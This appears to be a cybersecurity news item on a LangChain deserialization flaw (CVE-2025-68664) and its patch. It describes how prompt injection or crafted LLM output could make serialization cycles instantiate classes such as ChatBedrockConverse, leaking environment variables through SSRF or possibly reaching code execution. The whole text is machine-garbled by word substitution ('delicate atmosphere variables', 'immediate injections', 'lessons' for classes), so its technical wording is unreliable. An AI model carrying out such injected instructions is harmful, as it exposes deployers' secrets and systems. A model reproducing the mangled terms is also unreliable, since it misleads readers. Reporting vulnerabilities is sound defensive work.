A important vulnerability in LangChain’s core library (CVE-2025-68664) permits attackers to exfiltrate delicate atmosphere variables and doubtlessly execute code by means of deserialization flaws.
Found by a Cyata researcher and patched simply earlier than Christmas 2025, the difficulty impacts one of the crucial widespread AI frameworks with lots of of hundreds of thousands of downloads.
LangChain-core’s dumps() and dumpd() capabilities failed to flee user-controlled dictionaries containing the reserved ‘lc’ key, which marks inside serialized objects.
This led to deserialization of untrusted knowledge (CWE-502) when LLM outputs or immediate injections influenced fields like additional_kwargs or response_metadata, triggering serialization-deserialization cycles in widespread flows reminiscent of occasion streaming, logging, and caching. A CNA-assigned CVSS rating of 9.3 charges it Important, with 12 weak patterns recognized, together with astream_events(v1) and Runnable.astream_log().
Cyata safety researcher uncovered the flaw throughout audits of AI belief boundaries, recognizing the lacking escape in serialization code after tracing deserialization sinks.
Reported through Huntr on December 4, 2025, LangChain acknowledged it the following day and printed the advisory on December 24. Patches rolled out in langchain-core variations 0.3.81 and 1.2.5, which wrap ‘lc’-containing dicts and disable secrets_from_env by default—beforehand enabled, permitting direct env var leaks. The group awarded a document $4,000 bounty.
Attackers may craft prompts to instantiate allowlisted lessons like ChatBedrockConverse from langchain_aws, triggering SSRF with env vars in headers for exfiltration.
PromptTemplate allows Jinja2 rendering for attainable RCE if invoked post-deserialization. LangChain’s scale amplifies threat: pepy.tech logs ~847M whole downloads, pypistats ~98M final month.
Improve langchain-core instantly and confirm dependencies like langchain-community. Deal with LLM outputs as untrusted, audit deserialization in streaming/logs, and disable secret decision until inputs are verified. A parallel flaw hit LangChainJS (CVE-2025-68665), underscoring dangers in agentic AI plumbing.
Organizations should stock agent deployments for swift triage amid booming LLM app adoption.
Comply with us on Google Information, LinkedIn, and X for each day cybersecurity updates. Contact us to function your tales.
